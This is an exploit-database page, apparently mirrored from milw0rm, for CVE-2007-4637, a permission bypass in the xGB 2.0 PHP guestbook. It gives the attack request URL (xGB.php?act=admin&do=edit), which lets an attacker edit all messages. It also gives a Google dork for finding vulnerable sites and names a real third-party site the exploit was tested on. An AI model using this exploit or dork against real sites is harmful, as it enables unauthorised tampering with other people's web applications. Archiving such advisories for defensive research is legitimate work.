[] NeoSense
E X P L O I T S
title author type platform port cve id

xGB 2.0 - 'xGB.php' Remote Security Bypass

Author: DarkFuneral
type: webapps
platform: php
port: 
date_added: 2007-08-28 
date_updated:  
verified: 1 
codes: OSVDB-45855;CVE-2007-4637 
tags: 
aliases:  
screenshot_url:  
application_url: 
/*
*
* xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
* Bug discovered by DarkFuneral
* http://www.darkfuneral89.altervista.org/
*
* Affected Software: xGB
* CMS Site: "i don't know! :P"
* Severity: Critical
* Description: An attacker can edit all message in xGB
* Google Dork: allinurl:"xGb.php"
*
* E-Mail: darkfuneral89@gmail.com
*
*
*
*
* Exploit Code: http://www.site.com/path/xGB.php?act=admin&do=edit
*
*
*
* Tested on www.culturebeach.de/guestbook.php
*
* Special Greetz to SystemFAILURE because I Love Him...
*
*/

# milw0rm.com [2007-08-29]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.